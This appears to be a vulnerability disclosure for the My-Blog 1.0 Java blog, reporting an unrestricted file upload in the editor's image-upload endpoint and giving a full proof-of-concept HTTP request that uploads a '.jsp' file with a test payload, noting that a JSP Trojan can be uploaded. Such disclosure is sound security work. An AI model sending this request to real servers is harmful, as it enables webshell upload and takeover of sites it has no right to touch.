My-Blog 1.0 has any file upload

[LvZCh]

Source code name：My-Blog
Source code version：1.0
Source code download link：https://github.com/ZHENFENG13/My-Blog/archive/refs/heads/master.zip

Deployment precautions:
Before starting the project, it is necessary to open
src/main/java/com/site/blog/my/core/config/Constants.java
Change the file line upload path to your own absolute path
D:\XXX\My-Blog-master\src\main\resources\static\upload\

Code Audit:
In src/main/java/com/site/blog/my/core/controller/admin/BlogController.java, the uploadFileByEditomd method does not restrict the uploaded files

Vulnerability exploitation:

upload pictures

Corresponding data packet:

POST /admin/blogs/md/uploadfile?guid=1735205098420 HTTP/1.1
Host: 192.168.0.102:28083
Content-Length: 224
Cache-Control: max-age=0
Origin: http://192.168.0.102:28083
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrBk4QTGbN2cvOaPC
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.102:28083/admin/blogs/edit/4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E9CBB3A8B72CDBF558ECAED51B5F892F
Connection: close

------WebKitFormBoundaryrBk4QTGbN2cvOaPC
Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.jsp"
Content-Type: image/jpeg

<% out.println("test"); %>
------WebKitFormBoundaryrBk4QTGbN2cvOaPC--

Can upload JSP Trojan horse


You can also upload HTML